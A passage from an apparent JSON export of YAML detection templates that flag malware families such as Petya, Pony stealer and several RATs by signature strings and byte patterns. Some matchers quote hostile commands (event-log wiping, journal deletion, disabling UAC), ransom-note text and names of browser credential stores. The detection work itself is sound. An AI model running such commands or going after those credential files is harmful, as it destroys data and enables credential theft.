\"C740045C5C5C5CC740085C5C5C5C\"\n condition: or\n\n# digest: 4b0a004830460221009c75627de0e45f09b5bf2a0358d73f141011199867953d3dc66b1f43e4e6c6cf022100f3fc56b70ff4a4b743b167d94cbf8037f3eb3a5b9f76cd60dbc57a1f66bef5fb:922c64590222798bb761d5b6d8e72950\n", "hash": "e97d06f9c37540465ffaaaf4b8293f8b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbb" }, "name": "osx-leverage-malware.yaml", "content": "id: osx-leverage-malware\n\ninfo:\n name: OSX Leverage Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_OSX_Leverage.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"ioreg -l | grep \\\"IOPlatformSerialNumber\\\" | awk -F\"\n - \"+:Users:Shared:UserEvent.app:Contents:MacOS:\"\n - \"rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'\"\n - \"osascript -e 'tell application \\\"System Events\\\" to get the hidden of every login item'\"\n - \"osascript -e 'tell application \\\"System Events\\\" to get the name of every login item'\"\n - \"osascript -e 'tell application \\\"System Events\\\" to get the path of every login item'\"\n - \"serverVisible \\0\"\n condition: and\n\n# digest: 490a004630440220190e234b6d0f00657ae8e6f2d79b342fccf9e1dcb9c49de77781fa21e662da7302203dbf070c64970b142d6edbcb95b55be91252dff5ef95487e3a5ce7d106aafe5a:922c64590222798bb761d5b6d8e72950\n", "hash": "531373f554f79ed5c0ce56554183c8bf", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbc" }, "name": "paradox-malware.yaml", "content": "id: paradox-malware\n\ninfo:\n name: Paradox Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"ParadoxRAT\"\n - \"Form1\"\n - \"StartRMCam\"\n - 
\"Flooders\"\n - \"SlowLaris\"\n - \"SHITEMID\"\n - \"set_Remote_Chat\"\n condition: and\n\n# digest: 4a0a0047304502205cb43a84b5be60ac33d4401450525529ca661c5911dbe186e9b97b08cf437ca0022100b5b08da2e682f6a32b9e60236a33beadc9690a8959d876386778e5240754ad47:922c64590222798bb761d5b6d8e72950\n", "hash": "b80f5afba228846456fe6ef59dc9455b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbd" }, "name": "petya-malware-variant-1.yaml", "content": "id: petya-malware-variant-1\n\ninfo:\n name: Petya Malware (Variant 1) - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara\n tags: malware,file,petya\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Ooops, your important files are encrypted.\"\n - \"Send your Bitcoin wallet ID and personal installation key to e-mail\"\n - \"wowsmith123456@posteo.net. Your personal installation key:\"\n - \"Send $300 worth of Bitcoin to following address:\"\n - \"have been encrypted. 
Perhaps you are busy looking for a way to recover your\"\n - \"need to do is submit the payment and purchase the decryption key.\"\n condition: or\n\n# digest: 4b0a0048304602210084c742f95c8f61e60f9d2a9beb267e5daaec072b3fd36ccc733a70e01f2d1c9b02210086b0e7826a6055cca4010e7d175a1d1796e92e78392461f81c8ad5ce12d4d40e:922c64590222798bb761d5b6d8e72950\n", "hash": "2ab045f59b9daa631ae3a076421bb749", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbe" }, "name": "petya-malware-variant-3.yaml", "content": "id: petya-malware-variant-3\n\ninfo:\n name: Petya Malware (Variant 3) - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara\n tags: malware,file,petya\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"wevtutil cl Setup & wevtutil cl System\"\n - \"fsutil usn deletejournal /D %c:\"\n condition: or\n\n# digest: 490a0046304402200a5ce8456fd9e33848656de116ea8e935df34a4ec5bf5e18fc01dede3b0d5fd0022049187c34d01316789d0b3dca3ca9166a4543374e0243b654cee0dda079071867:922c64590222798bb761d5b6d8e72950\n", "hash": "47d8bc1675ad571bd67efdb2cad894f2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dbf" }, "name": "petya-malware-variant-bitcoin.yaml", "content": "id: petya-malware-variant-bitcoin\n\ninfo:\n name: Petya Malware (Variant Bitcoin) - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara\n tags: malware,file,petya\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 
\"MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB\"\n\n# digest: 4b0a00483046022100ca5946dce3e94679c1ef8d9d8b05b3e1e06086777d2e5a379d7742016c24bbf8022100f33cec782c1929a868debd0fa962536a8606e1ff273092979a250752d22956e7:922c64590222798bb761d5b6d8e72950\n", "hash": "f38648dbbff6eb24ca5f4b720bb5fb23", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc0" }, "name": "plasma-malware.yaml", "content": "id: plasma-malware\n\ninfo:\n name: Plasma Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Miner: Failed to Inject.\"\n - \"Started GPU Mining on:\"\n - \"BK: Hard Bot Killer Ran Successfully!\"\n - \"Uploaded Keylogs Successfully!\"\n - \"No Slowloris Attack is Running!\"\n - \"An ARME Attack is Already Running on\"\n - \"Proactive Bot Killer Enabled!\"\n - \"PlasmaRAT\"\n - \"AntiEverything\"\n condition: and\n\n# digest: 4a0a004730450221008eb65f1513c0e2aef9d97696947b1a4ff2b56632eb8996690e2974b945c6683e02201633a82d34627d923130fb638757d0c5c9b78f2228ce4c8ef9d44982f38db553:922c64590222798bb761d5b6d8e72950\n", "hash": "3431040854feda3dcf37a83330d76a4b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc1" }, "name": "poetrat-malware.yaml", "content": "id: poetrat-malware\n\ninfo:\n name: PoetRat Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_PoetRATDoc.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"launcher.py\"\n - \"smile.zip\"\n - \"smile_funs.py\"\n - \"frown.py\"\n - \"backer.py\"\n - \"smile.py\"\n - \"affine.py\"\n - \"cmd\"\n - \".exe\"\n condition: and\n\n - type: regex\n regex:\n - '(\\.py$|\\.pyc$|\\.pyd$|Python)'\n - '\\.dll'\n condition: and\n\n# digest: 4b0a00483046022100e09de2e10a3630983f1b2249a132629deeece25a89ffbf24c61a86058313df150221009fed290461f94ccf057c69f612a3356f50ea91833fc67e7666e1d3e22133abf0:922c64590222798bb761d5b6d8e72950\n", "hash": "949ca2e7afea0340c1c97aa9c1167a0f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc2" }, "name": "pony-malware.yaml", "content": "id: pony-malware\n\ninfo:\n name: Pony Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Pony.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}\"\n - \"YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0\"\n - \"POST %s HTTP/1.0\"\n - \"Accept-Encoding: identity, *;q=0\"\n condition: and\n\n# digest: 4b0a00483046022100d1488f9b654f6e62deb05f5d8aff7165d3f6bab59d11f4e9ea5753f549b4edf6022100f8b660933458693e2ff78b7f6f74e225837fb47e6dd535acb6946e7ef617c4e4:922c64590222798bb761d5b6d8e72950\n", "hash": "fe9afcbdba0a357ec4d6ec60fc0d5a87", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc3" }, "name": "pony-stealer-malware.yaml", "content": "id: pony-stealer-malware\n\ninfo:\n name: Windows Pony Stealer Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_pony_stealer.yara\n tags: malware,file,pony,stealer\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"signons.sqlite\"\n - \"signons.txt\"\n - \"signons2.txt\"\n 
- \"signons3.txt\"\n - \"WininetCacheCredentials\"\n - \"moz_logins\"\n - \"encryptedPassword\"\n - \"FlashFXP\"\n - \"BulletProof\"\n - \"CuteFTP\"\n condition: and\n case-insensitive: true\n\n# digest: 4a0a00473045022051137ec4287733be40855295f4df9e5a0c89085ddbc6af52449fd86bb78eeef9022100d0280cb88ff244d8e3753e6f5e9bf2ed1fd723610d42781b02c530800a711e38:922c64590222798bb761d5b6d8e72950\n", "hash": "66a9f44760861a91bf3cd474b79267a2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc4" }, "name": "powerware-malware.yaml", "content": "id: powerware-malware\n\ninfo:\n name: PowerWare Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara\n tags: malware,file,powerware\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"ScriptRunner.dll\"\n - \"ScriptRunner.pdb\"\n - \"fixed.ps1\"\n condition: and\n\n# digest: 4a0a0047304502202f84f482f615237f07e7c108cd61c226f08b6b515c6736d3e88fb43de8e7c025022100bcd4078138a73ac29b4c59b0b58365b09396c0db1a124c04fc08d86788f1e52a:922c64590222798bb761d5b6d8e72950\n", "hash": "dd12c9d31197138ba123d07625589242", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc5" }, "name": "pubsab-malware.yaml", "content": "id: pubsab-malware\n\ninfo:\n name: PubSab Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PubSab.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"_deamon_init\"\n - \"com.apple.PubSabAgent\"\n - \"/tmp/screen.jpeg\"\n condition: or\n\n - type: binary\n binary:\n - \"6B45E43789CA29C28955E4\"\n\n# digest: 
4b0a00483046022100e35038a4704449057d8c527208921acaf54a002d1f882572781ee2d32875aa29022100bbafab64c56d8a6a650628069a2ca792f78859923ff371f0ad3f0c18fd3d1215:922c64590222798bb761d5b6d8e72950\n", "hash": "ad6d3c2132fa8dbc36fb8388446a4ad9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc6" }, "name": "punisher-malware.yaml", "content": "id: punisher-malware\n\ninfo:\n name: Punisher Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"abccba\"\n - \"SpyTheSpy\"\n - \"wireshark\"\n - \"apateDNS\"\n - \"abccbaDanabccb\"\n condition: and\n\n - type: binary\n binary:\n - \"5C006800660068002E007600620073\"\n - \"5C00730063002E007600620073\"\n condition: and\n\n# digest: 4a0a004730450220680377c6a6c5163e263077764a7ef6300edd75e57a09766f330f652bd1a4a0110221008675d1a4b089ae3b37454d41799ea67eefcadee002720a2e2e561d2eab289adf:922c64590222798bb761d5b6d8e72950\n", "hash": "0b5692c79910aca69cf9bef91f991d0e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc7" }, "name": "pypi-malware.yaml", "content": "id: pypi-malware\n\ninfo:\n name: Fake PyPI Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PyPI.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"# Welcome Here! 
:)\"\n - \"# just toy, no harm :)\"\n - \"[0x76,0x21,0xfe,0xcc,0xee]\"\n condition: and\n\n# digest: 490a0046304402206b82fc613c832c971dacca4ebef281e7665c9f1f006f44a24c48296dae1a9b8c02206f9aea9c19d940aac173806aa1726900fb0fd68078dc61ab6496191f35d52fa5:922c64590222798bb761d5b6d8e72950\n", "hash": "ecc15726080832acf2ca80d3ef888d82", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc8" }, "name": "pythorat-malware.yaml", "content": "id: pythorat-malware\n\ninfo:\n name: PythoRAT Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"TKeylogger\"\n - \"uFileTransfer\"\n - \"TTDownload\"\n - \"SETTINGS\"\n - \"Unknown\"\n - \"#@#@#\"\n - \"PluginData\"\n - \"OnPluginMessage\"\n condition: and\n\n# digest: 4b0a004830460221009093ec1809d86d670fb071055cb0fddd67efae877cc74470a43365766d82b6a902210092ffcc0109b2a0d3d3133d1b1856cfb208b8dc90f531a363d9ddd4d527bdc72c:922c64590222798bb761d5b6d8e72950\n", "hash": "d910e35192e805e5aebb2c3e3a1ea5ac", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc9" }, "name": "qrat-malware.yaml", "content": "id: qrat-malware\n\ninfo:\n name: QRat Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"quaverse/crypter\"\n - \"Qrypt.class\"\n - \"Jarizer.class\"\n - \"URLConnection.class\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"e-data\"\n - \"Qrypt.class\"\n - \"Jarizer.class\"\n - \"URLConnection.class\"\n condition: and\n\n - type: word\n words:\n - \"e-data\"\n - \"quaverse/crypter\"\n - \"Jarizer.class\"\n - \"URLConnection.class\"\n condition: 
and\n\n - type: word\n part: raw\n words:\n - \"e-data\"\n - \"quaverse/crypter\"\n - \"Qrypt.class\"\n - \"URLConnection.class\"\n condition: and\n\n# digest: 4b0a00483046022100fedf267a13b375a9f38379878ddeb76727feb11d239ac2e0e6c9549acf3dbbde022100bb74b2c94ef235bbd7642ad6c930924f9e6138f3f60c219a7d39018eb62a5dcc:922c64590222798bb761d5b6d8e72950\n", "hash": "2cc6d9d72233083d082bb64b7f7f7e29", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dca" }, "name": "satana-dropper-malware.yaml", "content": "id: satana-dropper-malware\n\ninfo:\n name: Satana Dropper Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Satana.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"25732D547279457863657074\"\n - \"643A5C6C626574776D77795C75696A657571706C667775622E706462\"\n - \"71666E7476746862\"\n condition: and\n\n# digest: 4a0a0047304502205f28aaef12ecdda0670971694f70cf1e8a32caa2f72bc8ff0e7e4ad72ccc82ee02210087f065cda4b2fa25f7b687dc03332a6be7a6bed793f097a1b1507f4e653dc554:922c64590222798bb761d5b6d8e72950\n", "hash": "8f83c7efd283538cdeb3d8743750be1a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dcb" }, "name": "satana-malware.yaml", "content": "id: satana-malware\n\ninfo:\n name: Satana Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: binary\n binary:\n - \"210073006100740061006E00610021002E0074007800740000\"\n - \"456E756D4C6F63616C526573\"\n - \"574E65744F70656E456E756D5700\"\n - \"21534154414E4121\"\n condition: and\n\n - type: binary\n binary:\n - \"7467777975677771\"\n - \"537776776E6775\"\n condition: or\n\n# digest: 
4a0a00473045022100e0d617ca6bbe36bf2a8bd9c875e1fbf40332d5e385abe1e70cfa19ccbc96056f02203da10e9fd106a91ded24ea8f1a8fa96970b8ea2a902ee57372afa80d486d303a:922c64590222798bb761d5b6d8e72950\n", "hash": "d3659b1acda4bd5a655ee2a42aa7e9b2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dcc" }, "name": "shimrat-malware.yaml", "content": "id: shimrat-malware\n\ninfo:\n name: ShimRat Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \".dll\"\n - \".dat\"\n - \"QWERTYUIOPLKJHG\"\n - \"MNBVCXZLKJHGFDS\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"Data$$00\"\n - \"Data$$01%c%sData\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"ping localhost -n 9 /c %s > nul\"\n - \"Demo\"\n - \"Win32App\"\n - \"COMSPEC\"\n - \"ShimMain\"\n - \"NotifyShims\"\n - \"GetHookAPIs\"\n condition: and\n\n# digest: 4b0a004830460221009da26e19a00937b0d0349977f9fec211af3d556f9f893e2867131c0abd215ddf0221008601cdf41e002a97fba4584ad7e7c4df833a7b6f67cfa3bde6e2f3c5c87af44d:922c64590222798bb761d5b6d8e72950\n", "hash": "8cebf42abeed3a6f9422422855763fd3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dcd" }, "name": "shimratreporter-malware.yaml", "content": "id: shimratreporter-malware\n\ninfo:\n name: ShimRatReporter Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"IP-INFO\"\n - \"Network-INFO\"\n - \"OS-INFO\"\n - \"Process-INFO\"\n - \"Browser-INFO\"\n - \"QueryUser-INFO\"\n - \"Users-INFO\"\n - \"Software-INFO\"\n - \"%02X-%02X-%02X-%02X-%02X-%02X\"\n - \"(from environment) = %s\"\n - 
\"NetUserEnum\"\n - \"GetNetworkParams\"\n condition: and\n\n# digest: 4b0a004830460221008a0d2f7db3a9984378cf10f44fa78b4160a493e9e3b8bd7c6ae0ae600b0777cb022100b36b3c25e9b677e7c62fc45315d79df0f7157479630f3e871854cd7557538f54:922c64590222798bb761d5b6d8e72950\n", "hash": "27f6f1c343bd4ef46e9ea53907aba71e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dce" }, "name": "sigma-malware.yaml", "content": "id: sigma-malware\n\ninfo:\n name: Sigma Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Sigma.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \".php?\"\n - \"uid=\"\n - \"&uname=\"\n - \"&os=\"\n - \"&pcname=\"\n - \"&total=\"\n - \"&country=\"\n - \"&network=\"\n - \"&subid=\"\n condition: and\n\n# digest: 4a0a00473045022100923b2707a03e5401842cf8f3978904badc2e191971659a40e69614409a013d1302201e8ae19646d6ba3d6a7ec2c3c227de5b26f3d888fa7d454f5566994cdb44b7a0:922c64590222798bb761d5b6d8e72950\n", "hash": "426bbcbcc3496775ed3e1c7bd300ce1f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dcf" }, "name": "smallnet-malware.yaml", "content": "id: smallnet-malware\n\ninfo:\n name: SmallNet Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"!!<3SAFIA<3!!\"\n - \"!!ElMattadorDz!!\"\n condition: or\n\n - type: word\n part: raw\n words:\n - \"stub_2.Properties\"\n - \"stub.exe\"\n - \"get_CurrentDomain\"\n condition: and\n\n# digest: 4a0a00473045022051a244fc74e16f5e6862e07462f37cf639913cc7ee40223ad0d271197f1d028e022100ace9ba900210c44afc93693c5aeb0b618a2d793d6a2dcd761b5f85d9b5944f57:922c64590222798bb761d5b6d8e72950\n", "hash": "63755ba6f7b6f087351e8e8311750f4e", "level": 2, 
"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd0" }, "name": "snake-malware.yaml", "content": "id: snake-malware\n\ninfo:\n name: Snake Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Snake.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"Go build ID: \\\"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\\\"\"\n\n - type: binary\n binary:\n - \"89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF\"\n - \"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\"\n condition: and\n\n# digest: 4a0a00473045022034639cbc3aaa73d91005d132d39c09dd9f3c358777b4ce9c7eb0d08828404ed90221008ef9c8229ed2c014a5c70a2cfd5e8b5ca671e2bf8f50aad9646dd781650bd82d:922c64590222798bb761d5b6d8e72950\n", "hash": "f02f7297426966ab0e1e94be5b2dd48c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd1" }, "name": "sub7nation-malware.yaml", "content": "id: sub7nation-malware\n\ninfo:\n name: Sub7Nation Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"EnableLUA /t REG_DWORD /d 0 /f\"\n - \"*A01*\"\n - \"*A02*\"\n - \"*A03*\"\n - \"*A04*\"\n - \"*A05*\"\n - \"*A06*\"\n - \"#@#@#\"\n - \"HostSettings\"\n - \"sevane.tmp\"\n - \"cmd_.bat\"\n - \"a2b7c3d7e4\"\n - \"cmd.dll\"\n condition: and\n\n# digest: 4b0a00483046022100fb2764917f165bba45b38510991be14ee4b76e66856cce974eb53ff743f7dd2f022100bb16838b1f79589fb2ee28e8a48a8b56421df874e5bd2d1c2e301bdc7fddb183:922c64590222798bb761d5b6d8e72950\n", "hash": "dd085a718ec51a572645252b41c33cf8", "level": 2, "time": 
"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd2" }, "name": "t5000-malware.yaml", "content": "id: t5000-malware\n\ninfo:\n name: T5000 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_T5000.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"_tmpR.vbs\"\n - \"_tmpg.vbs\"\n - \"Dtl.dat\"\n - \"3C6FB3CA-69B1-454f-8B2F-BD157762810E\"\n - \"EED5CA6C-9958-4611-B7A7-1238F2E1B17E\"\n - \"8A8FF8AD-D1DE-4cef-B87C-82627677662E\"\n - \"43EE34A9-9063-4d2c-AACD-F5C62B849089\"\n - \"A8859547-C62D-4e8b-A82D-BE1479C684C9\"\n - \"A59CF429-D0DD-4207-88A1-04090680F714\"\n - \"utd_CE31\"\n - \"f:\\\\Project\\\\T5000\\\\Src\\\\Target\\\\1 KjetDll.pdb\"\n - \"l:\\\\MyProject\\\\Vc 7.1\\\\T5000\\\\T5000Ver1.28\\\\Target\\\\4 CaptureDLL.pdb\"\n - \"f:\\\\Project\\\\T5000\\\\Src\\\\Target\\\\4 CaptureDLL.pdb\"\n - \"E:\\\\VS2010\\\\xPlat2\\\\Release\\\\InstRes32.pdb\"\n condition: or\n\n# digest: 4b0a00483046022100c4d719f89ac4726441df42b1d0068c3cf398983de9ec48ebcc901802ff3a93d402210085f58b14a245c974e033ec00eb4038cb784244a023a72c86ad2d6b764d2d9c6a:922c64590222798bb761d5b6d8e72950\n", "hash": "654a3e02e36540f16611f9ec7f7044af", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd3" }, "name": "tedroo-malware.yaml", "content": "id: tedroo-malware\n\ninfo:\n name: Tedroo Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Tedroo.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"257325732E657865\"\n - \"5F6C6F672E747874\"\n condition: and\n\n# digest: 4b0a00483046022100c0edf2315be868e1c4cd22d05c74bee3a744b620c5b4c30312b6341c77b65e73022100a33de0b6394c6b823a31d816e69467ecd5740b9272d4afb53b8f8a1be5bb4238:922c64590222798bb761d5b6d8e72950\n", "hash": 
"27b5205a331e3ae1da0a8ac72f67d513", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd4" }, "name": "terminator-malware.yaml", "content": "id: terminator-malware\n\ninfo:\n name: Terminator Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Terminator.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Accelorator\"\n - \"12356\"\n condition: and\n\n# digest: 490a0046304402206fb3e105ea9cabbc826f3dcdd7109ad096bb1916aa0b2413019a80d6cc785650022016d325b3ea18206c6f3bf1e8e1b214c79328a6251572d7d70ae42c1b90e827ee:922c64590222798bb761d5b6d8e72950\n", "hash": "1d125467509ea09156abad4aefd735cd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd5" }, "name": "teslacrypt-malware.yaml", "content": "id: teslacrypt-malware\n\ninfo:\n name: TeslaCrypt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_TeslaCrypt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"4E6F7720697427732025493A254D25702E00000076616C2069732025640A0000\"\n\n# digest: 4a0a00473045022100cc5505ef331e458b96f5b74ed97eab506cedf912eb01039ce9b817fddcc960e502202306bebd061c483b1e14f1edab9a43258e9788023188fb37f96bd8d214088d0d:922c64590222798bb761d5b6d8e72950\n", "hash": "9433f4739bc3cdb4676b9ab1289a69ea", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd6" }, "name": "tox-malware.yaml", "content": "id: tox-malware\n\ninfo:\n name: Tox Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Tox.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - 
